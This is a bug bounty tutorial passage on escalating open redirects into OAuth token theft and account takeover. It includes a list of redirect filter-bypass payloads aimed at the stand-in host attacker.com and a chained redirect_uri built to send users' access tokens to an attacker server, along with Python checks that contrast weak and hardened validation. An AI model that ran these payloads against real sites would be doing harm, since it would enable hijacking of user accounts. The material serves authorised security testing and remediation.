
Mr Elite

Originally published on SecurityElites, the canonical, fully-updated version of this article.
Authorised Testing Only: All techniques covered here target authorised bug bounty programmes or systems you have explicit written permission to test. Exploiting OAuth token theft or account takeover chains against real users without authorisation is illegal under computer fraud legislation worldwide. SecurityElites.com accepts no liability for misuse.
Most bug bounty hunters file open redirects as Low severity and move on. The programme triage team accepts it, pays the minimum bounty, and closes the ticket. That is the correct call for a standalone redirect: sending a user to an arbitrary URL is a phishing aid, not an account takeover. But on a programme last year I found an open redirect on a target that also used OAuth for social login. I spent twenty minutes testing a chain. The redirect_uri in the OAuth flow accepted the target's own domain. The open redirect endpoint was on that domain. I crafted a link that sent any authenticated user's access token directly to my server. The programme rated it Critical. It paid $15,000. The original open redirect finding, filed standalone, would have paid $150.
The open redirect to account takeover chain is one of the most consistent severity-escalation paths in web application security. It is under-hunted because most hunters stop at the redirect confirmation. I cover the full chain here: OAuth token theft via redirect_uri manipulation, phishing bypass using on-domain redirects, and SSRF escalation via server-side redirect following. The difference between a Low finding and a Critical one is twenty minutes of methodical chaining.

### What You'll Master

- Confirm open redirects and enumerate chain potential before filing
- Chain open redirect to OAuth token theft: complete redirect_uri manipulation methodology
- Build a working account takeover proof of concept using Burp Collaborator
- Bypass open redirect protections: URL encoding, subdomain tricks, protocol-relative URLs
- Chain open redirect into SSRF via server-side redirect following
- Write the High/Critical severity report that reflects the actual impact

60 min · 3 exercises · Browser + PortSwigger + Burp Suite

### Prerequisites

- Day 11: Open Redirect Bug Bounty, the baseline open redirect detection methodology this article escalates
- Day 18: OAuth Bug Bounty, OAuth flow fundamentals; understanding authorisation codes, implicit flow, and redirect_uri validation is required for the chain
- Burp Suite installed: active proxy and Collaborator are used in Exercises 2 and 3

### Open Redirect to Account Takeover: Contents

1. Finding Open Redirects: Parameters, Patterns & Bypass Techniques
2. The OAuth Token Theft Chain: redirect_uri Manipulation
3. Phishing Bypass: Using On-Domain Redirects to Beat Filters
4. SSRF Chain: When the Server Follows Your Redirect
5. Building the Account Takeover PoC
6. Reporting: Severity Calculation and Evidence Package

The open redirect fundamentals from Day 11 cover detection and basic confirmation. That foundation ends with a confirmed redirect; today extends it into the question of whether the redirect chains into something that pays at a different tier. The OAuth knowledge from Day 18 is the direct prerequisite for Section 2. Read both before working through the exercises if you have not already.
Open redirects hide in predictable places. The post-login redirect parameter is the most common: after authentication, the application forwards the user to wherever they were trying to go, stored in a parameter. Logout flows redirect to a homepage or SSO portal. Email link tracking systems redirect from a tracking domain to the destination. OAuth redirect_uri parameters accept redirect destinations as part of the protocol. Every one of these is a candidate for testing.
**Open redirect: discovery patterns and confirmation**

```text
# Common redirect parameter names
?url= ?redirect= ?return= ?next=
?continue= ?goto= ?destination= ?target=
?link= ?returnTo= ?redirectTo= ?forward=
?redir= ?callback= ?successUrl= ?failUrl=

# Basic confirmation
https://target.com/logout?redirect=https://attacker.com
https://target.com/login?next=https://attacker.com
https://target.com/sso?return=https://attacker.com
If the browser navigates to attacker.com -> open redirect confirmed

# Filter bypass payloads
?redirect=//attacker.com                            (protocol-relative)
?redirect=https%3A%2F%2Fattacker.com                (URL-encoded scheme)
?redirect=%2F%2Fattacker.com                        (encoded protocol-relative)
?redirect=https://target.com.attacker.com           (trusted host as a subdomain)
?redirect=https://attacker.com?x=target.com         (trusted host in the query)
?redirect=https://target.com#https://attacker.com   (trusted host before the fragment)
?redirect=https%253A%252F%252Fattacker.com          (double-encoded)
?redirect=https://аttacker.com                      (Cyrillic а in place of Latin a)

# Locating candidate parameters in Burp
Burp Target -> Search -> regex: (url|redirect|next|return|goto)=https?://
```
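As an added example (not code from the article or from SecurityElites), here is a Python model of the two validation points the chain depends on: the application's post-login redirect check and the authorisation server's redirect_uri check, each in a weak form beside an exact-match form. The payload list above and the chained redirect_uri are embedded as constructed test values; target.com, attacker.com and the callback path are assumptions.

```python
from urllib.parse import urlparse, unquote

# Constructed values for this example: the relying party's host and its single
# registered OAuth callback. target.com / attacker.com follow the article.
TRUSTED_HOST = "target.com"
REGISTERED_REDIRECT_URI = "https://target.com/oauth/callback"

def naive_is_safe_redirect(url: str) -> bool:
    """Prefix check common in ?next= handlers. Defeated by '//attacker.com'
    (starts with '/') and 'https://target.com.attacker.com' (starts with the
    trusted origin string)."""
    return url.startswith("/") or url.startswith("https://" + TRUSTED_HOST)

def hardened_is_safe_redirect(url: str) -> bool:
    """Accept a single-slash relative path, or an absolute https URL whose
    parsed netloc is exactly TRUSTED_HOST. Decode once so %2F%2F is seen as
    //; reject scheme-relative and backslash forms outright."""
    url = unquote(url)
    if "\\" in url or url.startswith("//"):
        return False
    if url.startswith("/"):
        return True
    p = urlparse(url)
    return p.scheme == "https" and p.netloc.lower() == TRUSTED_HOST

def naive_redirect_uri_allowed(redirect_uri: str) -> bool:
    """Authorisation-server check that compares only the host: every path on
    target.com passes, including a logout endpoint with an open redirect."""
    return urlparse(redirect_uri).hostname == TRUSTED_HOST

def hardened_redirect_uri_allowed(redirect_uri: str) -> bool:
    """Exact string comparison against the registered value (the OAuth 2.0
    Security BCP recommendation); no path or query variation is accepted."""
    return redirect_uri == REGISTERED_REDIRECT_URI

# Bypass payloads from the list above, and the chained redirect_uri that
# routes the token through the on-domain open redirect.
BYPASS_PAYLOADS = [
    "//attacker.com",
    "https%3A%2F%2Fattacker.com",
    "%2F%2Fattacker.com",
    "https://target.com.attacker.com",
    "https://attacker.com?x=target.com",
    "https%253A%252F%252Fattacker.com",
    "https://\u0430ttacker.com",  # Cyrillic a in place of Latin a
]
CHAINED_REDIRECT_URI = "https://target.com/logout?redirect=https://attacker.com"
```

Run the hardened checks against the payload list during remediation testing; each entry should be rejected, while a plain relative path or an exact target.com URL is still accepted.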
### Exercise 1: Browser (15 min, authorised targets)

**Find and Confirm an Open Redirect on a Bug Bounty Target**

15 minutes · Browser only · Authorised scope required
Before any chaining attempt, you need a confirmed open redirect. This exercise runs the discovery and confirmation workflow, the same sequence I run at the start of every redirect chaining assessment. Use an authorised bug bounty target or the PortSwigger open redirect labs.
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites.
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.